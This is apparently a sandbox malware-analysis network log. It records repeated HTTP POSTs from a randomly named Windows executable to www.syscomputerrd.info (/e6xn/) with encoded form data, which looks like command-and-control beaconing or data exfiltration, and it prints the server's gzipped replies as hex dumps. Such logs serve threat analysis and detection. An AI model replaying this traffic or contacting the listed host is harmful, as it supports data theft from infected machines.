                                                                                  X-Endurance-Cache-Level: 2
                                                                                  X-nginx-cache: WordPress
                                                                                  Transfer-Encoding: chunked
                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                  Data Raw: 31 66 61 61 0d 0a 1f 8b 08 00 00 00 00 00 00 03 dc b2 db 72 db ca 92 2d fa 6c 7f 05 16 15 6b cb 9e 8b 00 41 90 94 44 ea b2 96 2d 5b 12 25 59 b6 75 a3 c4 ee 0e 47 a1 aa 08 94 58 40 c1 55 05 5e a4 f0 c7 f4 07 ec a7 fd b6 5f 4e c4 ee 1f 3b 59 00 78 93 a8 8b ed 39 fb ec 38 b2 09 a0 b2 32 47 8e 1c 39 b6 fe f6 e1 f3 ee f9 f5 97 8f 56 a8 23 be b3 65 9e 16 47 71 b0 5d a2 aa 04 67 8a c8 ce 56 44 35 b2 70 88 a4 a2 7a bb 74 71 be 67 6f 94 8a 68 8c 22 ba 5d 1a 30 3a 4c 84 d4 25 0b 8b 58 d3 18 b2 86 8c e8 70 9b d0 01 c3 d4 ce 0e 65 8b c5 4c 33 c4 6d 85 11 a7 db 55 c0 e0 2c ee 5b 92 f2 ed 52 22 45 8f 71 5a b2 42 49 7b db a5 50 eb 44 b5 2a 95 20 4a 02 47 c8 a0 32 ea c5 95 6a 75 a1 ed aa 14 be d0 6a 75 da 74 35 16 2c 26 74 54 b6 7a 82 73 31 5c b5 2a 3b 5b 9a 69 4e 77 be a0 80 5a b1 d0 70 93 c6 c4 b2 ad 4f 9f 2f db 9f da 1f 4f ce 3f 5b 87 17 97 f0 be f8 60 ed 7e fe 74 71 d2 3e 7f 77 da 7e b7 55 c9 eb f2 76 40 2e a1 52 8f b7 4b 22 68 71 61 e8 cf 8d 4a d5 b7 8f 67 25 d3 eb 61 72 86 32 97 fb b3 3c 1e 81 55 4c d3 6f 46 84 39 e8 17 20 59 5b 0a 4b 96 68 4b 8f 13 58 1b 4a 12 ce 30 d2 4c c4 15 4e fe 71 a3 44 0c 78 1c 29 b5 5d 1a 0b a4 34 6c 2a a4 11 b2 03 89 92 b0 b4 73 57 fa 57 d6 6d a4 4b ad e9 86 f2 14 b3 a3 52 b9 f4 af 3c b3 f5 6f 90 6a 7a 40 5e 87 fa 67 c0 d6 5c 32 32 57 17 de 0e 1d 34 d0 8e a6 11 58 07 c9 b1 63 86 aa ac 0c a9 af f2 fc 54 f2 e7 f3 21 2f d3 a1 f5 ec fc e5 12 a1 f9 f8 30 2f e4 43 20 11 46 3a b0 e4 3b 9c 07 e7 78 9f 51 24 71 58 5c 94 4b 1a c9 80 c2 dc b3 84 8f b1 96 e3 2f e0 38 9d 73 3d 07 62 1c 69 fa 3c e7 7f aa ed 3b 95 c1 7f d3 54 46 df 94 96 2c 0e 7e 94 7e 94 4b df 53 2a c7 36 8b 93 d4 68 2c e9 f7 94 49 4a 72 bf 3f 2c 29 fd f8 8f 72 89 c5 c7 28 0e 52 30 16 54 50 05 b1 1f 5b 95 7c 50 58 38 67 71 df 92 94 6f af 92 58 d9 89 a4 3d aa 71 b8 6a 85 f0 b5 bd fa 18 c5 55 63 bb e7 4a 23 34 c2 24 76 7c 21 34 d0 41 89 39 60 11 cd 6a f3 c4 89 18 3d b0 8e 72 02 a5 c1 70 38 4f c4 52 28 25 24 0b 58 9c 37 82 26 e0 b0 98 62 bd c8 a0 84 38 8c 1d 1b 75 97 78 57 2a f5 8f 51 c4 e1 8a 69 0e 77 cf 38 c1 fa 1f 12 7d 4f c5 a6 b5 47 29 29 e5 2c 9f 5b 59 0f 52 2b a5 ff 26 4e 16 a1 16 17 ca 02 8d c0 9e 48 32 a1 5e 48 13 2a 4c 89 9a f1 b5 b6 72 2b 00 66 8f 4a 4b 49 bc 5d 22 48 a3 96 a6 23 5d b9 41 03 94 df 6f fa 48 d1 b5 7a 79 97 6d 7c 6f 7f 18 86 1d f7 e4 e3 d7 cb d3 f7 9d f1 bb ef c7 c3 a4 86 3a 8d be 5f c3 e9 55 8d 0c bb 9d ea 00 45 fc bc 7b 75 ea 42 3c c6 e3 77 cd f6 81 62 d7 d1 de 6d f7 f2 72 ec ef b6 d7 da 51 e8 92 83 f7 b7 9f f9 70 70 b5 db bc 3d 8e 71 ea d7 0e 63 f8 4e fc ce
                                                                                  Data Ascii: 1faar-lkAD-[%YuGX@U^_N;Yx982G9V#eGq]gVD5pztqgoh"]0:L%XpeL3mU,[R"EqZBI{PD* JG2jujut5,&tTzs1\*;[iNwZpO/O?[`~tq>w~Uv@.RK"hqaJg%ar2<ULoF9 Y[KhKXJ0LNqDx)]4l*sWWmKR<ojz@^g\22W4XcT!/0/C F:;xQ$qX\K/8s=bi<;TF,~~KS*6h,IJr?,)r(R0TP[|PX8gqoX=qjUcJ#4$v|!4A9`j=rp8OR(%$X7&b8uxW*Qiw8}OG)),[YR+&NH2^H*Lr+fJKI]"H#]AoHzym|o:_UE{uB<wbmrQpp=qcN
                                                                                  Mar 18, 2024 14:48:34.158638954 CET1286INData Raw: 5e dc bd 3a c1 c7 de c9 00 47 97 f0 be d4 be 97 24 57 bb 1b a3 93 dd fa f0 f8 e6 3d 3e be c5 63 fa 01 8f 21 c6 8e 77 0f 39 3d f8 ca 3e b3 76 8a f7 1b 71 9b 0d 19 ae 75 e3 cb ab 43 d5 be 11 0c 1d 9c ba f8 e0 d3 1a 60 e3 e3 da a7 94 8c 1b 80 4b 00
                                                                                  Data Ascii: ^:G$W=>c!w9=>vquC`K:\{qr8(G]io80XE[i/gfG'}d?<!$h#za{5In~ArkxN;::Q5Y;mzv'r=@M
                                                                                  Mar 18, 2024 14:48:34.158651114 CET1286INData Raw: f1 c9 f8 fa b6 ca 8f 0f be a6 dd fd cb a8 7b d5 6e b6 cf df 29 a8 15 66 ee e3 68 6f 88 f7 2f d3 ee c7 13 81 3a a3 fe d1 c1 d7 a4 77 76 08 3d c1 27 11 4f bb 9d af ac 7d 5e 75 e9 d5 fb 6c 5f 17 07 87 03 bf c3 6f bb 67 d7 e0 8b 8d 66 3b 26 c3 d3 4e
                                                                                  Data Ascii: {n)fho/:wv='O}^ul_ogf;&Nu"~sF'U|~6~T$isflCU<8.T{=5XTvp!G|3U[_/NsOy0^{k+'
                                                                                  Mar 18, 2024 14:48:34.158689976 CET1286INData Raw: 0e 1a 68 47 d3 28 11 12 c9 b1 a3 98 a6 95 61 62 63 11 6b 1a eb 0a 46 38 a4 15 94 6a 91 68 16 b1 db 85 ef 6f 8a c5 01 a7 df fc 46 7d 83 f8 08 fb 1e 21 eb 75 e4 ad af 7b 9e 4b 89 db f4 1a 1b 94 78 be 93 84 c9 3f 07 54 6e 57 9d ea aa a5 c7 09 dd 5e
                                                                                  Data Ascii: hG(abckF8jhoF}!u{Kx?TnW^tQDCU(wFIxXUQ Qd(%CX@(x 4`,ahNU8-sj^-+GPzn}!-+KF!eA[VFnpE$\u f
                                                                                  Mar 18, 2024 14:48:34.158747911 CET1286INData Raw: 21 70 67 46 b1 b5 44 b1 ea 09 19 b5 30 4a 98 46 1c ac f5 14 6c 1e 28 06 8f 85 66 3d 86 91 36 94 27 a2 f4 38 05 9b c2 c3 26 a0 18 36 77 2d 29 86 9b 00 1d c4 36 d3 34 52 2d 4c 63 4d e5 54 a9 6a 2d 19 59 c6 41 9b 73 fe 2a 24 c8 a6 f6 85 24 60 5d a5
                                                                                  Data Ascii: !pgFD0JFl(f=6'8&6w-)64R-LcMTj-YAs*$$`]LBXp![$Vh}Tj&p?"IK>z5jV6S}EL7RK6 [N`X!1L['b]6"\k:C)d9;g+Xw.Jc.HwzyGql
                                                                                  Mar 18, 2024 14:48:34.158832073 CET1286INData Raw: 35 24 25 cf f5 9f 6b 55 e8 e0 b9 eb e5 fa 1a fc 7f ae f9 80 ca f1 74 15 68 6c da 4e dc c0 54 98 c5 9e 5c 82 57 db 28 17 bf 99 07 d6 9a 20 48 bd 5c 6d 36 9e 6b 8f 85 e0 a6 e7 10 c9 c8 56 09 c5 5a a6 d1 93 0d d7 eb d0 ab 6e 16 3f e7 b9 6a b9 ea 99
                                                                                  Data Ascii: 5$%kUthlNT\W( H\m6kVZn?j7Zf1 A}znIzM1AFyY@&P)/IeJ*]?k/$(=Fk) VoVcTrk=JRrFl6 su^k76s-0E}YY^s
                                                                                  Mar 18, 2024 14:48:34.158895969 CET852INData Raw: 83 df d3 ec a7 3a 3d cf b4 60 34 9d 52 52 f2 67 d2 5b 02 bf cc 63 54 8e a7 ca a3 b1 49 9f 98 82 a9 30 8f fd 96 cf 9e c7 5f c2 0a 0b c1 4d ea 10 c9 c8 56 09 c5 5a a6 d1 6f f1 58 8a b8 a4 33 f0 02 5a 39 e1 24 95 09 ff 3d cb 3c 84 7b b4 a7 2f 24 a1
                                                                                  Data Ascii: :=`4RRg[cTI0_MVZoX3Z9$=<{/$(&POy - N`63%=(7d+[}'>.%*B=i2-KK_y`Voe};F Dl0iB1(^Xy3D(m
                                                                                  Mar 18, 2024 14:48:34.158978939 CET1286INData Raw: 31 66 61 30 0d 0a 92 9c 3a a4 11 55 95 1e 47 2a 34 9c 2b f3 88 4e c4 62 07 82 99 54 6b 4e dd a9 3d 2a d5 33 db cf f0 ed 2c fa d7 6d 7d bd d6 5c 27 55 9f 6c d4 28 21 b4 ea 21 b2 b6 ee d6 ea 1b 2e 18 60 a3 e9 79 d3 ad 3f 3d ca c3 ad cf b3 7f 6a dd
                                                                                  Data Ascii: 1fa0:UG*4+NbTkN=*3,m}\'Ul(!!.`y?=j?TiYF]~bc4`LV-Z6RvD%o?bLOYXR2']}/kH8d@fv_;ZX%LjDH"b9ImFL{PO|7tQx
                                                                                  Mar 18, 2024 14:48:34.159024954 CET1286INData Raw: 49 ff 4d 8f 13 ba 5d ca 63 a5 ff 98 e4 cc df c1 66 a9 5e 7e 95 af 79 7a e7 e8 c0 56 9c 19 a6 43 46 02 aa 33 76 f6 50 a2 04 c6 9b d0 b1 ac bb d7 af 5e f9 08 f7 03 29 d2 98 80 8c 5c c8 96 b5 52 45 b5 75 44 36 5f bf fa f1 fa 95 d3 a3 48 a7 92 da 85
                                                                                  Data Ascii: IM]cf^~yzVCF3vP^)\REuD6_HlEq>Xd'F3'T8YUh"kz,Z!X_J`#Go,ol5e^+[6`dODL,:y&rMA5lfx8 _,KtWEb
                                                                                  Mar 18, 2024 14:48:34.159039021 CET1286INData Raw: a7 dc 73 41 7e 2c 3c 32 19 68 89 95 e7 c4 79 a2 a4 08 42 89 a4 88 60 99 46 be ad 25 62 7c 2e a0 80 9c 09 15 4a ac 00 65 61 76 03 c8 05 d9 c7 2e ac 94 5b 9c 95 1d 24 71 c8 06 f4 27 29 2d 1e 27 d7 2a 8d 0c 44 79 05 8b 28 82 10 b0 9b 7c 4d 78 3c b8
                                                                                  Data Ascii: sA~,<2hyB`F%b|.Jeav.[$q')-'*Dy(|Mx<9 tRm'I>y@{YVCf ,?R1=:=T{H$z&hF';Zh4DE,SWB:YzN.vbywOHHuh
                                                                                  Mar 18, 2024 14:48:34.268781900 CET1286INData Raw: 82 77 3b 8d 3e de 6f 26 7e fc 95 1f 9e b5 55 3b ea 8f 3e ef 37 7a 24 e2 9c 54 9b 37 d7 57 87 6e fb 46 b0 cb e8 72 dc de 37 dc 0e 13 b2 bf c1 8e 77 0f b3 bb 29 a7 28 74 c9 c1 fb db cf c0 ed 6a b7 29 68 8c d3 eb ab ae 7b 1c 9f 72 ff ea fd 00 47 7b
                                                                                  Data Ascii: w;>o&~U;>7z$T7WnFr7w)(tj)h{rG{czEW's}kooLn4|]_?>l~{O8=59W7LB/'sNbgni]JTLiZk.0;;ww}


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  38192.168.2.104975450.6.160.34806128C:\Program Files (x86)\HITCmsolmmQgoXoEXeUlcJSOtoDkWjBbuzmRRaLEYkE\EnKifmZDGZ.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Mar 18, 2024 14:48:36.357367039 CET793OUTPOST /e6xn/ HTTP/1.1
                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                  Accept-Encoding: gzip, deflate
                                                                                  Accept-Language: en-US
                                                                                  Host: www.syscomputerrd.info
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  Connection: close
                                                                                  Cache-Control: no-cache
                                                                                  Content-Length: 217
                                                                                  Origin: http://www.syscomputerrd.info
                                                                                  Referer: http://www.syscomputerrd.info/e6xn/
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
                                                                                  Data Raw: 62 76 4f 74 3d 34 57 38 34 45 77 47 41 4c 4e 41 66 59 42 62 64 53 65 71 47 6c 4b 4b 6b 48 65 35 53 37 42 54 59 5a 66 7a 61 48 31 6e 57 74 50 70 76 4b 55 51 6d 35 35 4c 6a 62 57 6a 32 30 42 51 77 39 59 62 2b 45 32 53 4a 59 4f 4c 67 2b 47 35 56 78 63 55 64 39 4a 51 46 77 71 32 4c 44 67 76 43 50 6a 31 4c 34 4d 61 2f 37 6b 42 6d 70 33 30 42 75 76 76 6e 54 66 6b 31 32 71 6e 2b 61 4d 30 6e 51 56 2f 37 63 63 73 62 50 58 70 46 4b 6a 57 62 39 59 48 7a 32 4c 65 6f 37 55 43 46 51 52 73 75 32 32 6e 48 2f 6f 33 77 72 44 53 36 42 53 72 74 38 47 4a 4b 36 41 45 65 73 4b 43 35 49 35 76 47 6b 33 7a 74 54 66 57 70 48 43 51 65 59 2f 79 63 55 76 30 77 7a 67 3d 3d
                                                                                  Data Ascii: bvOt=4W84EwGALNAfYBbdSeqGlKKkHe5S7BTYZfzaH1nWtPpvKUQm55LjbWj20BQw9Yb+E2SJYOLg+G5VxcUd9JQFwq2LDgvCPj1L4Ma/7kBmp30BuvvnTfk12qn+aM0nQV/7ccsbPXpFKjWb9YHz2Leo7UCFQRsu22nH/o3wrDS6BSrt8GJK6AEesKC5I5vGk3ztTfWpHCQeY/ycUv0wzg==
                                                                                  Mar 18, 2024 14:48:36.771097898 CET1286INHTTP/1.1 404 Not Found
                                                                                  Date: Mon, 18 Mar 2024 13:48:36 GMT
                                                                                  Server: Apache
                                                                                  Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                                  Cache-Control: no-cache, must-revalidate, max-age=0
                                                                                  Link: <https://hzw.avt.temporary.site/wp-json/>; rel="https://api.w.org/"
                                                                                  Upgrade: h2,h2c
                                                                                  Connection: Upgrade
                                                                                  Vary: Accept-Encoding
                                                                                  Content-Encoding: gzip
                                                                                  X-Endurance-Cache-Level: 2
                                                                                  X-nginx-cache: WordPress
                                                                                  Transfer-Encoding: chunked
                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                  Data Raw: 31 66 61 61 0d 0a 1f 8b 08 00 00 00 00 00 00 03 dc b2 db 72 db ca 92 2d fa 6c 7f 05 16 15 6b cb 9e 8b 00 41 90 94 44 ea b2 96 2d 5b 12 25 59 b6 75 a3 c4 ee 0e 47 a1 aa 08 94 58 40 c1 55 05 5e a4 f0 c7 f4 07 ec a7 fd b6 5f 4e c4 ee 1f 3b 59 00 78 93 a8 8b ed 39 fb ec 38 b2 09 a0 b2 32 47 8e 1c 39 b6 fe f6 e1 f3 ee f9 f5 97 8f 56 a8 23 be b3 65 9e 16 47 71 b0 5d a2 aa 04 67 8a c8 ce 56 44 35 b2 70 88 a4 a2 7a bb 74 71 be 67 6f 94 8a 68 8c 22 ba 5d 1a 30 3a 4c 84 d4 25 0b 8b 58 d3 18 b2 86 8c e8 70 9b d0 01 c3 d4 ce 0e 65 8b c5 4c 33 c4 6d 85 11 a7 db 55 c0 e0 2c ee 5b 92 f2 ed 52 22 45 8f 71 5a b2 42 49 7b db a5 50 eb 44 b5 2a 95 20 4a 02 47 c8 a0 32 ea c5 95 6a 75 a1 ed aa 14 be d0 6a 75 da 74 35 16 2c 26 74 54 b6 7a 82 73 31 5c b5 2a 3b 5b 9a 69 4e 77 be a0 80 5a b1 d0 70 93 c6 c4 b2 ad 4f 9f 2f db 9f da 1f 4f ce 3f 5b 87 17 97 f0 be f8 60 ed 7e fe 74 71 d2 3e 7f 77 da 7e b7 55 c9 eb f2 76 40 2e a1 52 8f b7 4b 22 68 71 61 e8 cf 8d 4a d5 b7 8f 67 25 d3 eb 61 72 86 32 97 fb b3 3c 1e 81 55 4c d3 6f 46 84 39 e8 17 20 59 5b 0a 4b 96 68 4b 8f 13 58 1b 4a 12 ce 30 d2 4c c4 15 4e fe 71 a3 44 0c 78 1c 29 b5 5d 1a 0b a4 34 6c 2a a4 11 b2 03 89 92 b0 b4 73 57 fa 57 d6 6d a4 4b ad e9 86 f2 14 b3 a3 52 b9 f4 af 3c b3 f5 6f 90 6a 7a 40 5e 87 fa 67 c0 d6 5c 32 32 57 17 de 0e 1d 34 d0 8e a6 11 58 07 c9 b1 63 86 aa ac 0c a9 af f2 fc 54 f2 e7 f3 21 2f d3 a1 f5 ec fc e5 12 a1 f9 f8 30 2f e4 43 20 11 46 3a b0 e4 3b 9c 07 e7 78 9f 51 24 71 58 5c 94 4b 1a c9 80 c2 dc b3 84 8f b1 96 e3 2f e0 38 9d 73 3d 07 62 1c 69 fa 3c e7 7f aa ed 3b 95 c1 7f d3 54 46 df 94 96 2c 0e 7e 94 7e 94 4b df 53 2a c7 36 8b 93 d4 68 2c e9 f7 94 49 4a 72 bf 3f 2c 29 fd f8 8f 72 89 c5 c7 28 0e 52 30 16 54 50 05 b1 1f 5b 95 7c 50 58 38 67 71 df 92 94 6f af 92 58 d9 89 a4 3d aa 71 b8 6a 85 f0 b5 bd fa 18 c5 55 63 bb e7 4a 23 34 c2 24 76 7c 21 34 d0 41 89 39 60 11 cd 6a f3 c4 89 18 3d b0 8e 72 02 a5 c1 70 38 4f c4 52 28 25 24 0b 58 9c 37 82 26 e0 b0 98 62 bd c8 a0 84 38 8c 1d 1b 75 97 78 57 2a f5 8f 51 c4 e1 8a 69 0e 77 cf 38 c1 fa 1f 12 7d 4f c5 a6 b5 47 29 29 e5 2c 9f 5b 59 0f 52 2b a5 ff 26 4e 16 a1 16 17 ca 02 8d c0 9e 48 32 a1 5e 48 13 2a 4c 89 9a f1 b5 b6 72 2b 00 66 8f 4a 4b 49 bc 5d 22 48 a3 96 a6 23 5d b9 41 03 94 df 6f fa 48 d1 b5 7a 79 97 6d 7c 6f 7f 18 86 1d f7 e4 e3 d7 cb d3 f7 9d f1 bb ef c7 c3 a4 86 3a 8d be 5f c3 e9 55 8d 0c bb 9d ea 00 45 fc bc 7b 75 ea 42 3c c6 e3 77 cd f6 81 62 d7 d1 de 6d f7 f2 72 ec ef b6 d7 da 51 e8 92 83 f7 b7 9f f9 70 70 b5 db bc 3d 8e 71 ea d7 0e 63 f8 4e fc ce
                                                                                  Data Ascii: 1faar-lkAD-[%YuGX@U^_N;Yx982G9V#eGq]gVD5pztqgoh"]0:L%XpeL3mU,[R"EqZBI{PD* JG2jujut5,&tTzs1\*;[iNwZpO/O?[`~tq>w~Uv@.RK"hqaJg%ar2<ULoF9 Y[KhKXJ0LNqDx)]4l*sWWmKR<ojz@^g\22W4XcT!/0/C F:;xQ$qX\K/8s=bi<;TF,~~KS*6h,IJr?,)r(R0TP[|PX8gqoX=qjUcJ#4$v|!4A9`j=rp8OR(%$X7&b8uxW*Qiw8}OG)),[YR+&NH2^H*Lr+fJKI]"H#]AoHzym|o:_UE{uB<wbmrQpp=qcN
                                                                                  Mar 18, 2024 14:48:36.771156073 CET1286INData Raw: 5e dc bd 3a c1 c7 de c9 00 47 97 f0 be d4 be 97 24 57 bb 1b a3 93 dd fa f0 f8 e6 3d 3e be c5 63 fa 01 8f 21 c6 8e 77 0f 39 3d f8 ca 3e b3 76 8a f7 1b 71 9b 0d 19 ae 75 e3 cb ab 43 d5 be 11 0c 1d 9c ba f8 e0 d3 1a 60 e3 e3 da a7 94 8c 1b 80 4b 00
                                                                                  Data Ascii: ^:G$W=>c!w9=>vquC`K:\{qr8(G]io80XE[i/gfG'}d?<!$h#za{5In~ArkxN;::Q5Y;mzv'r=@M
                                                                                  Mar 18, 2024 14:48:36.771169901 CET1286INData Raw: f1 c9 f8 fa b6 ca 8f 0f be a6 dd fd cb a8 7b d5 6e b6 cf df 29 a8 15 66 ee e3 68 6f 88 f7 2f d3 ee c7 13 81 3a a3 fe d1 c1 d7 a4 77 76 08 3d c1 27 11 4f bb 9d af ac 7d 5e 75 e9 d5 fb 6c 5f 17 07 87 03 bf c3 6f bb 67 d7 e0 8b 8d 66 3b 26 c3 d3 4e
                                                                                  Data Ascii: {n)fho/:wv='O}^ul_ogf;&Nu"~sF'U|~6~T$isflCU<8.T{=5XTvp!G|3U[_/NsOy0^{k+'
                                                                                  Mar 18, 2024 14:48:36.771238089 CET1286INData Raw: 0e 1a 68 47 d3 28 11 12 c9 b1 a3 98 a6 95 61 62 63 11 6b 1a eb 0a 46 38 a4 15 94 6a 91 68 16 b1 db 85 ef 6f 8a c5 01 a7 df fc 46 7d 83 f8 08 fb 1e 21 eb 75 e4 ad af 7b 9e 4b 89 db f4 1a 1b 94 78 be 93 84 c9 3f 07 54 6e 57 9d ea aa a5 c7 09 dd 5e
                                                                                  Data Ascii: hG(abckF8jhoF}!u{Kx?TnW^tQDCU(wFIxXUQ Qd(%CX@(x 4`,ahNU8-sj^-+GPzn}!-+KF!eA[VFnpE$\u f
                                                                                  Mar 18, 2024 14:48:36.771297932 CET1286INData Raw: 21 70 67 46 b1 b5 44 b1 ea 09 19 b5 30 4a 98 46 1c ac f5 14 6c 1e 28 06 8f 85 66 3d 86 91 36 94 27 a2 f4 38 05 9b c2 c3 26 a0 18 36 77 2d 29 86 9b 00 1d c4 36 d3 34 52 2d 4c 63 4d e5 54 a9 6a 2d 19 59 c6 41 9b 73 fe 2a 24 c8 a6 f6 85 24 60 5d a5
                                                                                  Data Ascii: !pgFD0JFl(f=6'8&6w-)64R-LcMTj-YAs*$$`]LBXp![$Vh}Tj&p?"IK>z5jV6S}EL7RK6 [N`X!1L['b]6"\k:C)d9;g+Xw.Jc.HwzyGql
                                                                                  Mar 18, 2024 14:48:36.771383047 CET1286INData Raw: 35 24 25 cf f5 9f 6b 55 e8 e0 b9 eb e5 fa 1a fc 7f ae f9 80 ca f1 74 15 68 6c da 4e dc c0 54 98 c5 9e 5c 82 57 db 28 17 bf 99 07 d6 9a 20 48 bd 5c 6d 36 9e 6b 8f 85 e0 a6 e7 10 c9 c8 56 09 c5 5a a6 d1 93 0d d7 eb d0 ab 6e 16 3f e7 b9 6a b9 ea 99
                                                                                  Data Ascii: 5$%kUthlNT\W( H\m6kVZn?j7Zf1 A}znIzM1AFyY@&P)/IeJ*]?k/$(=Fk) VoVcTrk=JRrFl6 su^k76s-0E}YY^s
                                                                                  Mar 18, 2024 14:48:36.771430016 CET852INData Raw: 83 df d3 ec a7 3a 3d cf b4 60 34 9d 52 52 f2 67 d2 5b 02 bf cc 63 54 8e a7 ca a3 b1 49 9f 98 82 a9 30 8f fd 96 cf 9e c7 5f c2 0a 0b c1 4d ea 10 c9 c8 56 09 c5 5a a6 d1 6f f1 58 8a b8 a4 33 f0 02 5a 39 e1 24 95 09 ff 3d cb 3c 84 7b b4 a7 2f 24 a1
                                                                                  Data Ascii: :=`4RRg[cTI0_MVZoX3Z9$=<{/$(&POy - N`63%=(7d+[}'>.%*B=i2-KK_y`Voe};F Dl0iB1(^Xy3D(m
                                                                                  Mar 18, 2024 14:48:36.771480083 CET1286INData Raw: 31 66 61 30 0d 0a 92 9c 3a a4 11 55 95 1e 47 2a 34 9c 2b f3 88 4e c4 62 07 82 99 54 6b 4e dd a9 3d 2a d5 33 db cf f0 ed 2c fa d7 6d 7d bd d6 5c 27 55 9f 6c d4 28 21 b4 ea 21 b2 b6 ee d6 ea 1b 2e 18 60 a3 e9 79 d3 ad 3f 3d ca c3 ad cf b3 7f 6a dd
                                                                                  Data Ascii: 1fa0:UG*4+NbTkN=*3,m}\'Ul(!!.`y?=j?TiYF]~bc4`LV-Z6RvD%o?bLOYXR2']}/kH8d@fv_;ZX%LjDH"b9ImFL{PO|7tQx
                                                                                  Mar 18, 2024 14:48:36.771531105 CET1286INData Raw: 49 ff 4d 8f 13 ba 5d ca 63 a5 ff 98 e4 cc df c1 66 a9 5e 7e 95 af 79 7a e7 e8 c0 56 9c 19 a6 43 46 02 aa 33 76 f6 50 a2 04 c6 9b d0 b1 ac bb d7 af 5e f9 08 f7 03 29 d2 98 80 8c 5c c8 96 b5 52 45 b5 75 44 36 5f bf fa f1 fa 95 d3 a3 48 a7 92 da 85
                                                                                  Data Ascii: IM]cf^~yzVCF3vP^)\REuD6_HlEq>Xd'F3'T8YUh"kz,Z!X_J`#Go,ol5e^+[6`dODL,:y&rMA5lfx8 _,KtWEb
                                                                                  Mar 18, 2024 14:48:36.771585941 CET1286INData Raw: a7 dc 73 41 7e 2c 3c 32 19 68 89 95 e7 c4 79 a2 a4 08 42 89 a4 88 60 99 46 be ad 25 62 7c 2e a0 80 9c 09 15 4a ac 00 65 61 76 03 c8 05 d9 c7 2e ac 94 5b 9c 95 1d 24 71 c8 06 f4 27 29 2d 1e 27 d7 2a 8d 0c 44 79 05 8b 28 82 10 b0 9b 7c 4d 78 3c b8
                                                                                  Data Ascii: sA~,<2hyB`F%b|.Jeav.[$q')-'*Dy(|Mx<9 tRm'I>y@{YVCf ,?R1=:=T{H$z&hF';Zh4DE,SWB:YzN.vbywOHHuh
                                                                                  Mar 18, 2024 14:48:36.880999088 CET1286INData Raw: 82 77 3b 8d 3e de 6f 26 7e fc 95 1f 9e b5 55 3b ea 8f 3e ef 37 7a 24 e2 9c 54 9b 37 d7 57 87 6e fb 46 b0 cb e8 72 dc de 37 dc 0e 13 b2 bf c1 8e 77 0f b3 bb 29 a7 28 74 c9 c1 fb db cf c0 ed 6a b7 29 68 8c d3 eb ab ae 7b 1c 9f 72 ff ea fd 00 47 7b
                                                                                  Data Ascii: w;>o&~U;>7z$T7WnFr7w)(tj)h{rG{czEW's}kooLn4|]_?>l~{O8=59W7LB/'sNbgni]JTLiZk.0;;ww}


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  39192.168.2.104975550.6.160.34806128C:\Program Files (x86)\HITCmsolmmQgoXoEXeUlcJSOtoDkWjBbuzmRRaLEYkE\EnKifmZDGZ.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Mar 18, 2024 14:48:38.999963045 CET1806OUTPOST /e6xn/ HTTP/1.1
                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                  Accept-Encoding: gzip, deflate
                                                                                  Accept-Language: en-US
                                                                                  Host: www.syscomputerrd.info
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  Connection: close
                                                                                  Cache-Control: no-cache
                                                                                  Content-Length: 1229
                                                                                  Origin: http://www.syscomputerrd.info
                                                                                  Referer: http://www.syscomputerrd.info/e6xn/
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
                                                                                  Data Raw: 62 76 4f 74 3d 34 57 38 34 45 77 47 41 4c 4e 41 66 59 42 62 64 53 65 71 47 6c 4b 4b 6b 48 65 35 53 37 42 54 59 5a 66 7a 61 48 31 6e 57 74 50 52 76 4a 6e 59 6d 32 34 4c 6a 61 57 6a 32 2b 68 51 78 39 59 61 69 45 32 4b 4e 59 4f 47 43 2b 45 52 56 78 39 30 64 34 34 51 46 2b 71 32 4c 66 51 76 48 41 44 31 43 34 4d 4b 37 37 67 6c 6d 70 33 30 42 75 73 33 6e 45 62 51 31 77 71 6e 39 4b 63 30 64 55 56 2f 48 63 63 30 4c 50 58 74 7a 4b 51 4f 62 39 34 33 7a 33 39 4b 6f 39 45 43 48 58 52 73 49 32 32 71 58 2f 6f 72 47 72 44 6e 58 42 56 66 74 39 52 67 74 68 42 55 2b 77 71 6d 73 4a 4b 6a 78 32 79 76 2b 62 38 58 31 45 79 31 48 50 4c 33 4c 41 4d 64 6c 73 31 55 70 7a 77 64 6c 73 52 41 50 59 41 78 45 51 70 6e 34 4c 65 55 44 57 56 36 48 6a 45 62 6d 45 65 6f 78 70 6e 75 31 38 44 78 6a 30 61 47 4d 63 4c 6b 65 43 79 79 5a 6f 45 51 68 77 46 45 6a 52 42 37 76 6a 68 30 4d 65 4c 42 50 63 78 4a 50 41 48 4c 74 6a 7a 61 38 79 69 4d 57 6a 38 44 53 50 41 67 6f 6c 69 59 73 30 4d 65 75 4d 46 38 35 4e 4b 76 4d 6d 7a 69 6b 36 4f 6b 58 64 41 70 69 34 66 62 72 44 5a 36 73 54 36 74 69 58 68 6c 36 32 62 77 34 35 44 77 4e 65 76 70 71 51 57 69 57 52 36 6d 5a 49 61 51 69 58 68 6a 4b 41 44 53 6f 2b 55 62 4e 79 38 4a 73 47 53 34 77 68 38 67 65 55 59 44 74 69 6d 36 6f 48 56 5a 37 38 76 6d 38 30 6d 63 2f 77 6d 30 72 62 54 52 66 64 77 61 72 48 42 42 61 69 67 4e 69 69 51 2b 76 77 38 46 7a 38 7a 65 67 79 56 48 76 31 72 46 39 45 67 74 52 6b 73 6d 52 47 6e 4c 65 35 59 32 41 37 7a 4c 30 76 45 65 65 4a 2b 46 46 53 53 78 59 43 69 48 38 47 78 52 5a 4e 76 37 6b 51 4c 48 6b 36 2b 49 4d 78 37 6b 49 69 48 50 38 6e 30 37 56 71 4b 